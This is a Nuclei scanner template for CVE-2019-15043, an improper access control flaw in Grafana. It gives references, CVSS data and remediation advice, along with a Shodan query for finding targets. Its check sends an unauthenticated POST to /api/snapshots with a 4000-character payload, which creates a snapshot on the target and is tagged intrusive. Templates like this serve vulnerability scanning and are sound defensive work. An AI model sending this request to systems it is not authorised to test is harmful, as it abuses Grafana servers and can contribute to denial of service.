id: CVE-2019-15043 info: name: Grafana - Improper Access Control author: Joshua Rogers severity: high description: | Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. remediation: Upgrade to 6.3.4 or higher. reference: - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://bugzilla.redhat.com/show_bug.cgi?id=1746945 - https://aaron-hoffmann.com/posts/cve-2019-15043/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043 - https://nvd.nist.gov/vuln/detail/CVE-2019-15043 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 epss-score: 0.22002 epss-percentile: 0.95964 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: grafana product: grafana shodan-query: title:"Grafana" tags: cve,cve2019,grafana,dos,intrusive variables: payload: '{{repeat("A", 4000)}}' http: - method: POST path: - "{{BaseURL}}/api/snapshots" body: '{"dashboard": {"name":"{{payload}}"}}' headers: Content-Type: "application/json" matchers-condition: and matchers: - type: word part: body words: - '"deleteUrl":' - '"deleteKey":' - '"key":' - '"url":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 4a0a00473045022100b2ea3e9d104ad5c41c8e9d3a804b4ed187cbad7c0bb5e81fc4043d63e2904243022044782ce250ad37fd6f88f8d6682d9cdf067ae0366b7f860fceb097bce32522d9:922c64590222798bb761d5b6d8e72950